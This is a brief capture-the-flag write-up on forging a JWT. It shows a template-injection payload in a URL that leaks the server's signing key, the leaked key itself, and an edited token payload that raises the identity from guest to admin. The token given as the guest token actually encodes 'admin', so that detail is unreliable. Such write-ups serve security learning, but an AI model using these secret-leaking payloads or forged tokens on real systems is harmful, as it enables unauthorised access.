Tags: authentification jwt
Rating:
- this is that we got from login as guest user:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQzMDI4MjAsIm5iZiI6MTU4NDMwMjgyMCwianRpIjoiNGEyYWJhODYtMmI2OC00NGQ5LTkwZGMtMTFkMzg5NzQ5NjgyIiwiaWRlbnRpdHkiOiJhZG1pbiIsImZyZXNoIjpmYWxzZSwidHlwZSI6ImFjY2VzcyJ9Cg.{a verification sign}
part one : {"typ":"JWT","alg":"HS256"}
part two : {"iat":1584302820,"nbf":1584302820,"jti":"4a2aba86-2b68-44d9-90dc-11d389749682","identity":"guest","fresh":false,"type":"access"}
part 3 : a verification sign that concat part one with part two and give it to HS256 encoding function that uses a unique key !!
- so we need to change the parameters to this :
{"typ":"JWT","alg":"HS256"}{"iat":1584307608,"nbf":1584307608,"jti":"d0274da7-afe1-4af6-8d81-106b282533c9","identity":"admin","fresh":false,"type":"access"}
and using this key to sign verification progress : ( http://66.172.11.208:5000/{{config.get('JWT_SECRET_KEY')}} )
this_is_a_$uper_secure_key
and finally send JWT that we generate within a request to server and we got flag ... !
(best tool for generate JWT : https://jwt.io/)